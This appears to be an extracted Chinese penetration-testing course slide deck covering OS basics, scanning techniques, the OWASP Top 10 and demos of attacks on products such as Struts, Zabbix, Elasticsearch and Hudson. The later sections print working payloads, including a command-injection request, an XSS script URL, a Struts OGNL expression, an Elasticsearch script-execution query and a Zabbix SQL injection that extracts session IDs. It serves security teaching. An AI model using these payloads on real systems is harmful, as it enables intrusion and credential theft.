渗透测试入门实战(校订版)

渗透测试入门主讲：

2023/11/7第一章：渗透测试简介什么是渗透测试渗透测试（PenetrationTesting）

——是为了证明网络防御按照预期计划正常运行而提供的一种机制。实现原理：

依据

对已知或未知漏洞测试、模拟攻击

目地

重点：降低风险、完善目前的安全策略

特点

人工检测、工具扫描、可控非破坏什么是渗透测试渗透测试流程

渗透测试渗透测试工具

BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第二章、

操作系统简介OS是用户与硬件系统之间的接口，运行在禅机上管理、调度计算机的各种软硬件资源扩充硬件的功能，为应用程序的开发和运行提供高效率的平台2.3操作系统简介2.3.1操作系统功能操作系统——是一组对计算机资源进行控制与管理的系统化程序集合，是系统软件的核心。目的：提高各类资源利用率，并能方便用户使用，为其他软件的开发提供必要的服务和相应的接口。功能：管理计算机的所有（硬件和软件）资源操作系

统设备管理信息管理内存管理处理器管理CPU内存外存外设用户用户接口2.3.2操作系统发展过程单用户单任务操作系统：如：DOS、CP/M批处理操作系统单道批处理系统：单任务OS。多道批处理系统：多任务OS多个程序或多个作业同时存在和运行分时操作系统（多用户、多任务）多个用户通过终端共同使用同一台计算机处理器调度程序（任务管理器），采用按时间片轮转策略，各个用户轮流“分时”共享了CPU如：UNIX是最流行的多用户、多任务、分时操作系统，实时操作系统及时、快速对事件进行响应和处理化工、炼油等生产过程的自动控制；军事上的武器制导；自动订票系统、股票、银行系统等。网络操作系统是指网络服务器上使用的操作系统，提供网络通讯和网络资源共享的操作系统微机操作系统（通用操作系统）：如：Windows、MacOS2.3.3进程（任务）进程——一个正在执行的程序程序的一次执行过程，是操作系统调度和分配的一个独立单位；一个程序与其数据一道在计算机上顺利执行时所发生的活动作业——程序从被选中、到运行结束、并再次成为程序的整个过程操作系统把进程管理归纳为：程序成为作业，进而成为进程10作业不都是进程，所有进程都是作业；作业进入内存运行就为进程，等待运行的作业不是进程程序不都是作业，作业都是程序；程序根据用户需要，可以成为作业，也可能不会。2.3.4线程线程——进程的进一步细分单线程：一个程序只在一个进程就可以处理所有任务多线程：一个程序可以分解成多个进程共同完成程序的任务其中：被分解的不同进程称为线程UNIX操作系统——把进程作为CPU的分配单位Windows操作系统——把线程作为CPU的分配单位大部分应用程序都采用多线程的结构CPU采用线程作为分配单位的优点：充分共享资源、减少内存开销提高并发性、加快切换速度2.3.5常用操作系统简介11.DOS(MS-DOS)：单用户、单任务2.WindowsWindows9X、ME、2000、XP、Vista

、Windows7单用户、多任务WindowsNT及2000/XPServer多用户、多任务，网络操作系统（局域网）3.UINX多用户、多任务，网络操作系统（巨型机、大型机）使用最广泛、影响最大的主流OS4.Linux是一种源代码向世人公开操作系统（自由软件），多用户、多任务、网络操作系统可用于：巨型机、大型机，工作站、个人计算机2.3.5常用操作系统简介25.OS/21987年IBM公司为PS/2机配备的OS6.MacOS在苹果公司的PowerMacintosh机、Macintosh一族计算机使用的OS基于图形界面、有较强的图形处理能力，广泛应用于平面出版、多媒体领域与WINDOWS不兼容！7.NovellNetWare一种基于文件服务、目录服务的OS，用于构建局域网2.3.6文件系统——计算机是以文件的形式组织和存储数据的。常用文件系统Ext2、FAT、FAT32、NTFS文件名构成：Windows文件名构成：主文件名.扩展名Windows文件名不区分大小写；Unix文件名区分大小写文件名中不能使用的符号有：<、>、/、\、|、:、”、*、?文件属性：只读：文件只能读取，不能修改隐藏：文件和文件夹是浅色的，一般情况是不显示的存档：任何一个新创建或修改的文件都有存档属性文件名中的通配符（英文符号）“?”：表示或代替任意的一个字符“*”：表示或代替任意的多个字符Windows支持的文件系统常见扩展名见P39通配符用法介绍搜索对象说明通配符表示第1字符（即首字符）为A的文件A*.*扩展名为.EXE的文件*.EXE首字符为B的文本文件B*.TXTWord文档*.DOCX第3字符为B的PPT文件??B*.PPT所有文件、文件夹*.*搜索栏第三章、密码学简介17信息社会的发展与挑战

人类进入信息化社会时代。数字化、信息化、网络化正在冲击、影响、改变我们社会生活的各个方面。从科学研究、生产制造、产品流通、商业运作、超市购物、医疗服务、教育培训、出版印刷、媒体传播，到文化生活、娱乐消闲、人际交往、法律规范、伦理道德、乃至军事作战等等，无一不将受到信息网络的挑战，无一不在信息技术这一最新高科技生产力的作用下迅速变化。18信息社会的发展与挑战信息过量，难以消化；

信息真假，难以辨识;信息形式不一致，难以统一处理；数据生产、传输能力远大于数据分析能力；人们被数据淹没，却饥饿于知识;信息安全，难以保证。

19Internet上的对抗与威胁信息空间(Cyberspace)中的侦察与反侦察、截获和反截获、破译和反破译、破坏和反破坏的斗争愈演愈烈。 军事上,1991年初的海湾战争、2003年伊拉克战争，实际上就是信息战。 商业上的情报战也随着Internet和Intranet的发展而步入了新的阶段。20Internet上的对抗与威胁Internet一方面成为人们离不开的信息工具，同时也成为公开的攻击对象目标。网络的全球性、开放性、无缝连通性、共享性、动态性，使任何人都可以自由地接入Internet，其中有善者，也有恶者。恶意者时刻在试图穿透别人的系统，捣毁别人的信箱、散布破坏性信息、倾泻信息拉圾。Internet的安全已受到普遍的重视。21实例蠕虫事件1988年12月2日RobertT.Morris向Internet注入Internet蠕虫，侵犯了Internet中的数千台主机。捕获通行字(Passwordsniffing)1994年好多大学连向Internet，有数千个通行字被Sniffing程序捕获。22实例序列号(Sequencenumber)攻击

1994年底，KevinMitnick发出的序列号攻击，攻破了数个计算中心，其中包括TsutomuShimomura的SanDiego的超导计算中心。IP恶作剧(Spoofing)、会话劫持(Sessionhijacking)拒绝服务(denialofservice)攻击。e-mail炸弹，pingofdeathTCPSYNflood23实例利用各种bugs和设计局限的攻击Javaapplets和Activexcontrols提供了攻击主机和整个网站的新的可能缓冲区溢出攻击TCP/IP协议和业务本身固有的弱点也关系到Internet的安全问题其它方面如主机结构，接入控制，管理上的问题。24实例

安全不是一种可以证明的特性

只能说在某些已知攻击下是安全的，对于将来的新的攻击是否仍安全就很难断言。如对密码分析中的定时(Timing)攻击，对安全存储秘密钥的硬件器件进行差分故障分析DFA(Differentialfaultanalysis。

第四章、渗透测试方法2023/11/7基于Web渗透测试扫描解析输入Web主机风险信息收集解析应用程序分析应用程序，会话机制、客户端控件等SQL、XSS、RFI等测试代理、配置不当，中间件等识别分析与利用HackingOWASPTOP10注入漏洞跨站脚本失效的身份验证和回话管理不安全的直接对象引用CSRF安全配置错误不安全的加密存储没有限制URL访问传输层保护不足未验证的重定向和转发Hacking注入漏洞——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1

and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)Hacking注入漏洞——SQL注入事实上，对错误信息进行封装并不一定能阻止攻击者的入侵行为，封装的错误信息，但是攻击己经形成，有攻击者能根据封装的错误信息对攻击结果进行判断，继续实施攻击。其实盲注就是通过封装的消息来收集攻击过程中需要的信息。30Hacking注入漏洞——命令注入POST/aim/synRequest.doHTTP/1.1



method=trace_route&ip=&m=5&w=2|ifconfig31Hacking跨站脚本存储型反射型DOM型32Hacking跨站脚本原理简单，利用却不简单WEB2.0是XSS的新温床XSS/CSRFWORM：Samyworm&Sinaweiboworm1、跨站URL：/pub/star/g/xyyyd%22%3E%3Cscript%20src=///images/t.js%3E%3C/script%3E?type=update2、由JS发起CSRF：

a、发微博

b、加关注

c、发私信AboutSamyWorm:/wiki/Samy_(XSS)http://namb.la/popular/33Hacking任意文件读取

34Hacking任意文件读取

35Hacking任意文件读取

36Hacking任意文件读取

37Hacking任意文件读取

38Hacking上传漏洞——修改参数39Hacking上传漏洞——欺骗

40Hacking上传漏洞——APP客户端41Hacking认证错误——原始信息的校验方式1、不校验——直接构造恶意数据修改密码2、校验COOKIE——CSRFHacking目录遍历——移动代理服务器43Hacking错误信息——“友好”的返回信息44Hacking错误信息——

HTTPFuzzing对错误信息的利用Hacking参数错误——权限的鉴别http://site/d477340ffa28755c?OpenDocumenthttp://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocumentHacking参数错误——权限的鉴别http://site/download.asp?file=/path/down_file.rarHacking参数错误——权限的鉴别http://site/download.asp?file=/path/down_file.rarHacking逻辑错误一个密码找回的逻辑错误获取验证码为5为纯数字，有效期为30分钟，可以暴力破解。通过HTTPFUZZING获得Hacking逻辑错误Hacking逻辑错误一个密码找回的逻辑错误Hacking逻辑错误

修改任意账号密码第五章、情报收集2023/11/7教学内容情报来源情报收集收集过程情报管理情报来源来源面企业外部企业内部人际面客户对应窗口客户其他窗口主管，其他主管同事，部下资料面客户订单或生产计划客户产能调查或通函客户销售计划会议记录工作联络单文件数据资料活动层面生产说明会检讨会月生产说明会内部检讨会交接说明会情报收集

技术部门提供管理部门提供销售部门提供生产部门提供会计部门提供收集过程过程内容情报处理格式转换，记录，集中，分类，筛选，组合，评级情报分析现状评价，未来预测情报扩散情报通讯，情报分析，专题研究，分享保密情报管理机构设置岗位担当情报存档物与情报流第六章、扫描和枚举2023/11/72023/11/761信息收集：扫描技术基于TCP/IP协议，对各种网络服务，无论是主机或者防火墙、路由器都适用扫描可以确认各种配置的正确性，避免遭受不必要的攻击用途，双刃剑安全管理员可以用来确保自己系统的安全性黑客用来探查系统的入侵点端口扫描的技术已经非常成熟，目前有大量的商业、非商业的扫描器62扫描器的重要性扫描器能够暴露网络上潜在的脆弱性无论扫描器被管理员利用，或者被黑客利用，都有助于加强系统的安全性它能使得漏洞被及早发现，而漏洞迟早会被发现的扫描器可以满足很多人的好奇心扫描器除了能扫描端口，往往还能够发现系统存活情况，以及哪些服务在运行用已知的漏洞测试这些系统对一批机器进行测试，简单的迭代过程有进一步的功能，包括操作系统辨识、应用系统识别63扫描器历史早期80年代，网络没有普及，上网的好奇心驱使许多年轻人通过Modem拨号进入到UNIX系统中。这时候的手段需要大量的手工操作于是，出现了wardialer——自动扫描，并记录下扫描的结果现代的扫描器要先进得多SATAN:SecurityAdministrator'sToolforAnalyzingNetworks

1995年4月发布，引起了新闻界的轰动界面上的突破，从命令行走向图形界面(使用HTML界面)，不依赖于X两位作者的影响(DanFarmer写过网络安全检查工具COPS，另一位WeitseVenema是TCP_Wrapper的作者)Nmap作者为Fyodor，技术上，是最先进的扫描技术大集成结合了功能强大的通过栈指纹来识别操作系统的众多技术64扫描技术主机扫描：确定在目标网络上的主机是否可达，同时尽可能多映射目标网络的拓扑结构，主要利用ICMP数据包端口扫描：发现远程主机开放的端口以及服务操作系统指纹扫描：根据协议栈判别操作系统65传统主机扫描技术ICMPEchoRequest(type8)和EchoReply(type0)通过简单地向目标主机发送ICMPEchoRequest数据包，并等待回复的ICMPEchoReply包，如PingICMPSweep（PingSweep）使用ICMPEchoRequest一次探测多个目标主机。通常这种探测包会并行发送，以提高探测效率

BroadcastICMP设置ICMP请求包的目标地址为广播地址或网络地址，则可以探测广播域或整个网络范围内的主机，这种情况只适合于UNIX/Linux系统Non-EchoICMP其它ICMP服务类型（13和14、15和16、17和18）也可以用于对主机或网络设备如路由器等的探测66高级主机扫描技术利用被探测主机产生的ICMP错误报文来进行复杂的主机探测

异常的IP包头向目标主机发送包头错误的IP包，目标主机或过滤设备会反馈ICMPParameterProblemError信息。常见的伪造错误字段为HeaderLength和IPOptions。不同厂家的路由器和操作系统对这些错误的处理方式不同，返回的结果也不同。在IP头中设置无效的字段值向目标主机发送的IP包中填充错误的字段值，目标主机或过滤设备会反馈ICMPDestinationUnreachable信息。这种方法同样可以探测目标主机和网络设备67高级主机扫描技术（续）通过超长包探测内部路由器若构造的数据包长度超过目标系统所在路由器的PMTU且设置禁止分片标志,该路由器会反馈FragmentationNeededandDon’tFragmentBitwasSet差错报文。反向映射探测用于探测被过滤设备或防火墙保护的网络和主机。构造可能的内部IP地址列表，并向这些地址发送数据包。当对方路由器接收到这些数据包时，会进行IP识别并路由，对不在其服务的范围的IP包发送ICMPHostUnreachable或ICMPTimeExceeded错误报文，没有接收到相应错误报文的IP地址可被认为在该网络中68主机扫描的对策使用可以检测并记录ICMP扫描的工具使用入侵检测系统在防火墙或路由器中设置允许进出自己网络的ICMP分组类型69端口扫描技术开放扫描(OpenScanning)需要扫描方通过三次握手过程与目标主机建立完整的TCP连接可靠性高，产生大量审计数据，容易被发现半开放扫描(Half-OpenScanning)扫描方不需要打开一个完全的TCP连接秘密扫描(StealthScanning)不包含标准的TCP三次握手协议的任何部分

隐蔽性好，但这种扫描使用的数据包在通过网络时容易被丢弃从而产生错误的探测信息

70端口扫描技术基本的TCPconnect()扫描（开放）Reverse-ident扫描（开放）TCPSYN扫描(半开放)IPIDheaderaka“dump”扫描(半开放)TCPFin扫描(秘密)TCPXMAS扫描(秘密)TCPftpproxy扫描(bounceattack)用IP分片进行SYN/FIN扫描(躲开包过滤防火墙)UDPICMP端口不可达扫描UDPrecvfrom扫描7172TCPconnect()扫描原理扫描器调用socket的connect()函数发起一个正常的连接如果端口是打开的，则连接成功否则，连接失败优点简单，不需要特殊的权限缺点服务器可以记录下客户的连接行为，如果同一个客户轮流对每一个端口发起连接，则一定是在扫描73Reverse-ident扫描Ident协议(RFC1413)使得可以发现任何一个通过TCP连接的进程的所有者的用户名，即使该进程并没有发起该连接只有在TCP全连接之后才有效TCP端口113例如可以先连接到80端口，然后通过identd来发现服务器是否在root下运行建议关闭ident服务，或者在防火墙上禁止，除非是为了审计的目的74

TCPSYN扫描原理向目标主机的特定端口发送一个SYN包如果应答包为RST包，则说明该端口是关闭的否则，会收到一个SYN|ACK包。于是，发送一个RST，停止建立连接由于连接没有完全建立，所以称为“半开连接扫描”优点很少有系统会记录这样的行为缺点在UNIX平台上，需要root权限才可以建立这样的SYN数据包75IPIDheaderaka“dump”扫描由Antirez首先使用，并在Bugtraq上公布原理：扫描主机通过伪造第三方主机IP地址向目标主机发起SYN扫描，并通过观察其IP序列号的增长规律获取端口的状态优点不直接扫描目标主机也不直接和它进行连接，隐蔽性较好缺点对第三方主机的要求较高

76TCPFin扫描原理扫描器发送一个FIN数据包如果端口关闭的，则远程主机丢弃该包，并送回一个RST包否则的话，远程主机丢弃该包，不回送变种，组合其他的标记优点不是TCP建立连接的过程，所以比较隐蔽缺点与SYN扫描类似，也需要构造专门的数据包在Windows平台无效，总是发送RST包77TCPXMAS扫描原理扫描器发送的TCP包包头设置所有标志位关闭的端口会响应一个同样设置所有标志位的包开放的端口则会忽略该包而不作任何响应优点比较隐蔽缺点主要用于UNIX/Linux/BSD的TCP/IP的协议栈不适用于Windows系统78分片扫描它本身并不是一种新的扫描方法，而是其他扫描技术的变种，特别是SYN扫描和FIN扫描思想是，把TCP包分成很小的分片，从而让它们能够通过包过滤防火墙注意，有些防火墙会丢弃太小的包而有些服务程序在处理这样的包的时候会出现异常，或者性能下降，或者出现错误79TCPftpproxy扫描FTPbounceattack原理用PORT命令让ftpserver与目标主机建立连接，而且目标主机的端口可以指定如果端口打开，则可以传输否则，返回"425Can'tbuilddataconnection:Connectionrefused."Ftp这个缺陷还可以被用来向目标(邮件,新闻)传送匿名信息优点：这种技术可以用来穿透防火墙缺点：慢，有些ftpserver禁止这种特性80UDPICMP端口不可达扫描利用UDP协议（主机扫描？）原理开放的UDP端口并不需要送回ACK包，而关闭的端口也不要求送回错误包，所以利用UDP包进行扫描非常困难有些协议栈实现的时候，对于关闭的UDP端口，会送回一个ICMPPortUnreach错误缺点速度慢，而且UDP包和ICMP包都不是可靠的需要root权限，才能读取ICMPPortUnreach消息一个应用例子Solaris的rpcbind端口(UDP)位于32770之上，这时可以通过这种技术来探测81UDPrecvfrom()&write()扫描非root用户不能直接读取ICMPPortUnreach消息，但是Linux提供了一种方法可以间接通知到原理第二次对一个关闭的UDP端口调用write()总是会失败经验：在ICMP错误到达之前，在UDP端口上调用recvfrom()会返回EAGAIN(重试)，否则会返回ECONNREFUSED(连接拒绝…)82端口扫描的对策设置防火墙过滤规则，阻止对端口的扫描例如可以设置检测SYN扫描而忽略FIN扫描使用入侵检测系统禁止所有不必要的服务，把自己的暴露程度降到最低Unix或linux中，在/etc/inetd.conf中注释掉不必要的服务，并在系统启动脚本中禁止其他不必要的服务Windows中通过Services禁止敏感服务，如IIS第七章、实施漏洞扫描2023/11/784nmapByFyodor作者研究了诸多扫描器，每一种扫描器都有自己的优点，它把所有这些技术集成起来，写成了nmap源码开放，C语言两篇技术文档TheArtofPortScanningRemoteOSdetectionviaTCP/IPStackFingerPrinting除了扫描功能，更重要的是，可以识别操作系统，甚至是内核的版本85Nmap用于扫描86Nmap用于扫描(续)87X-scan88扫描器SATANSAINTSSSStrobeX-Scan……ISS(安氏)PingerPortscanSuperscan流光第八章、破解密码2023/11/7常见的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …互联网攻防Struts演示如何利用Struts进入你的服务器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}92互联网攻防Struts演示93互联网攻防Struts演示梦网合作自助服务12590远程代码执行94互联网攻防HeartbleedOpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta1ofOpenSSL1.0.2等版本95互联网攻防SplunkXSS

OpenSSLTLS心跳信息泄漏漏洞未授权访问

代码执行96互联网攻防Splunk代码执行97互联网攻防SAP漏洞演示SAPNetWeaver是基于专业标准的集成化应用平台，能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。98互联网攻防Hadoop通过hadoop,hbase，hdfs0.2RC版本的管理web端能远程执行命令，通过该节点对集群服务器进行任务分发（该是基本功能，当然可以进行批量提权linux主机）渗透进hadoop集群。99互联网攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22\%22)%2b\%22-\%22%2bSystem.getProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}100互联网攻防Zend,ThkphpZendframework读取任意文件Demo选择的原因:脚本小子只会读取任意文件，高级黑客能拿来做什么？内网端口扫描内网服务器攻击HTTP攻击暴力破解101互联网攻防Cacti0day如何利用Cacti进入你的服务器0day互联网攻防ZabbixZabbix弱口令SQl注入httpmon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)互联网攻防Zenoss

互联网攻防Hudson创建任务Buildamaven2projectBuild写入execwinshellBuildnowhttp://ip:8080/Buildsconsole互联网攻防HudsonHiveHQL可以通过transform自定义Hive使用的Map/Reduce脚本，从而调用shell/python等语言，默认皆可用，导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限。互联网攻防Jboss认证绕过控制台密码JMXinvokerServlet107LDAP

108互联网攻防Rsync,NFSCMS生成html静态文件通过rsync发布DemoNFS漏洞利用…109互联网攻防VmwareVMwarevCenterOrchestrator在Web管理工具的实现上存在安全漏洞，可被利用泄露vCenter服务器密码。互联网攻防F5在多家银行测试发现，导致内网信息泄露互联网攻防